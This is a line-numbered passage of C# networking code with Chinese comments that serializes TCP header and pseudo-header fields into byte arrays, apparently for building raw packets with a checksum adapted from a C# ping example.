447 Array.Copy(b_psh_mbz, 0 , buffer, index, b_psh_mbz.Length);
448 index += b_psh_mbz.Length;
449
450
451
452 Array.Copy(b_psh_ptcl, 0 , buffer, index, b_psh_ptcl.Length);
453 index += b_psh_ptcl.Length;
454 Array.Copy(b_psh_tcpl, 0 , buffer, index, b_psh_tcpl.Length);
455 index += b_psh_tcpl.Length;
456 if (index != size)
457 {
458 rtn = - 1 ;
459 return rtn;
460 }
461 else
462 {
463
464
465 rtn = index;
466 return rtn;
467 }
468
469 }
470 // 这个是把tcp伪首部转为字节数组用的
471 public Int32 tchto(tcpHeader tch, byte [] buffer, int size)
472 {
473 Int32 rtn;
474 int index = 0 ;
475 byte [] b_tch_sport = BitConverter.GetBytes(tch.th_sport);
476 byte [] b_tch_dport = BitConverter.GetBytes(tch.th_dport);
477 byte [] b_tch_seq = BitConverter.GetBytes(tch.th_seq);
478 byte [] b_tch_ack = BitConverter.GetBytes(tch.th_ack);
479 byte [] b_tch_lenres = new byte [ 1 ];
480 b_tch_lenres[ 0 ] = tch.th_lenres;
481 byte [] b_tch_flag = new byte [ 1 ];
482 b_tch_flag[ 0 ] = tch.th_flag;
483 byte [] b_tch_win = BitConverter.GetBytes(tch.th_win);
484 byte [] b_tch_sum = BitConverter.GetBytes(tch.th_sum);
485 byte [] b_tch_urp = BitConverter.GetBytes(tch.th_urp);
486
487
488 Array.Copy(b_tch_sport, 0 , buffer, index, b_tch_sport.Length);
489 index += b_tch_sport.Length;
490 Array.Copy(b_tch_dport, 0 , buffer, index, b_tch_dport.Length);
491 index += b_tch_dport.Length;
492 Array.Copy(b_tch_seq, 0 , buffer, index, b_tch_seq.Length);
493 index += b_tch_seq.Length;
494
495
496
497 Array.Copy(b_tch_ack, 0 , buffer, index, b_tch_ack.Length);
498 index += b_tch_ack.Length;
499 Array.Copy(b_tch_lenres, 0 , buffer, index, b_tch_lenres.Length);
500 index += b_tch_lenres.Length;
501 Array.Copy(b_tch_flag, 0 , buffer, index, b_tch_flag.Length);
502 index += b_tch_flag.Length;
503
504 Array.Copy(b_tch_win, 0 , buffer, index, b_tch_win.Length);
505 index += b_tch_win.Length;
506 Array.Copy(b_tch_sum, 0 , buffer, index, b_tch_sum.Length);
507 index += b_tch_sum.Length;
508 Array.Copy(b_tch_urp, 0 , buffer, index, b_tch_urp.Length);
509 index += b_tch_urp.Length;
510 if (index != size)
511 {
512
513
514 rtn = - 1 ;
515 return rtn;
516 }
517 else
518 {
519
520 rtn = index;
521 return rtn;
522 }
523 }
524 // 这个是把tcp部分转为字节数组用的,因为这个要用到2次就不把这个和伪首部放一块了。
525 }
526 }
527
528
529 // 最后,本代码校验部分的方法参考了用c#实现ping程序的文章
530